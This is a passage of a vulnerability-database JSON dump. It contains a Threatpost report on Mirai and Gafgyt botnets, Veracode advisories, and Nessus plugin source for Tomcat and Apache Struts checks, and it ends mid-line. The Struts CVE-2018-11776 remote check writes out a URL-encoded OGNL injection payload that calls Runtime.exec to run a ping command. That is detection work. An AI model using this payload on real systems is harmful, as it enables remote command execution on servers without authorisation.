hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) stems from a lack of validation of user-supplied parameters passed to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. 
After that, the botnet launches a BlackNurse DDoS attack, a method first discovered in November 2016 that uses ICMP Type 3 Code 3 packets to cause high CPU loads.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of these newly targeted vulnerabilities comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 
2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T15:19:39", "description": "struts2-core is vulnerable to remote code execution (RCE) attacks. 
These attacks are possible when using a `namespace` or `url` tag which doesn't have a `value` and `action` set and where its upper action configuration is using a wildcard `namespace` or has no `namespace`.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T17:36:38", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2020-07-16T05:52:58", "id": "VERACODE:7342", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-7342/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T15:26:36", "description": "Apache Tomcat is vulnerable to insecure defaults. The CORS filter provided by default is insecure as it enables `supportsCredentials` for all origins. 
This can allow a malicious user unauthorized access to sensitive resources.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-17T04:40:32", "type": "veracode", "title": "Insecure Defaults", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2020-06-16T05:48:45", "id": "VERACODE:6315", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6315/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:22:04", "description": "Apache Tomcat is vulnerable to insecure defaults. The CORS filter provided by default is insecure as it enables `supportsCredentials` for all origins. 
This can allow a malicious user unauthorized access to sensitive resources.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-15T09:24:32", "type": "veracode", "title": "Insecure Defaults", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2020-12-08T07:38:25", "id": "VERACODE:13001", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13001/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T15:30:01", "description": "spring-security-config is vulnerable to unauthorized access through method security. 
It is possible because it does not check that the authenticated users hold the required authority to access the methods.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-10T07:20:11", "type": "veracode", "title": "Unauthorised Access Through Method Security", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2022-04-11T18:42:02", "id": "VERACODE:6270", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6270/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-20T14:39:00", "description": "According to the version of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. 
It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration.\n Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2018-1220)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1220.NASL", "href": "https://www.tenable.com/plugins/nessus/111182", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111182);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-8014\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2018-1220)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability 
:\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1220\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6f58db6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-3.h1\",\n \"tomcat-admin-webapps-7.0.76-3.h1\",\n \"tomcat-el-2.2-api-7.0.76-3.h1\",\n \"tomcat-jsp-2.2-api-7.0.76-3.h1\",\n \"tomcat-lib-7.0.76-3.h1\",\n 
\"tomcat-servlet-3.0-api-7.0.76-3.h1\",\n \"tomcat-webapps-7.0.76-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:41:15", "description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n 
script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:40:20", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. 
An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/17\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. 
An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach var cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = 
get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = 
